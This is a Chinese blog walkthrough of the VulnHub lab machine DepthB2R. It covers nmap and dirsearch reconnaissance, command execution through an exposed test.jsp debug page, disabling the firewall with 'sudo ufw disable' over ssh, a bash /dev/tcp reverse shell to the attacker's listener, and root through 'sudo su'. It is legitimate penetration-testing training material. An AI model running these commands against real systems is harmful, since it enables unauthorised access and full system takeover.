vulnhub系列:DepthB2R

于 2024-08-03 18:15:38 发布
阅读量163 收藏 1
点赞数 7
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/140894675
版权

vulnhub系列:DepthB2R

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

image-20240803164700023

nmap扫描端口,开放端口8080

nmap 192.168.23.175 -p- -A -Pn -sV

image-20240803165053621

访问8080端口

image-20240803164916295

点击 manager webapp 会跳转一个登录框

image-20240803165151231

manager/html

image-20240803165203685

尝试了一下弱口令,爆破等,没有登录进去

dirsearch目录扫描

python3 dirsearch.py -u http://192.168.23.175:8080/

image-20240803165636331

访问test.jsp,是一个debug页面

image-20240803165604423

输入ls -la /home,发现root 和bill用户

ls -la /home

image-20240803170004914

可以执行命令,但是尝试反弹shell失败,看一下进程,发现有ssh,之前没有扫到,可能是因为防火墙

ps aux

image-20240803170424743

查看/etc下,防火墙是存在的

ls -la /etc

image-20240803170628329

尝试关闭

ssh bill@localhost sudo ufw disable

image-20240803170735011

二、getshell

再次尝试反弹shell,kali开启监听

nc -lvnp 4444

image-20240803170837334

执行命令,成功反弹shell

ssh bill@localhost bash -i >& /dev/tcp/192.168.23.133/4444 0>&1

image-20240803171142716

三、提权

查看当前权限,显示all

sudo -l

image-20240803171332486

直接sudo su,提权成功

sudo su

image-20240803171449024

三天三夜睡不着
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值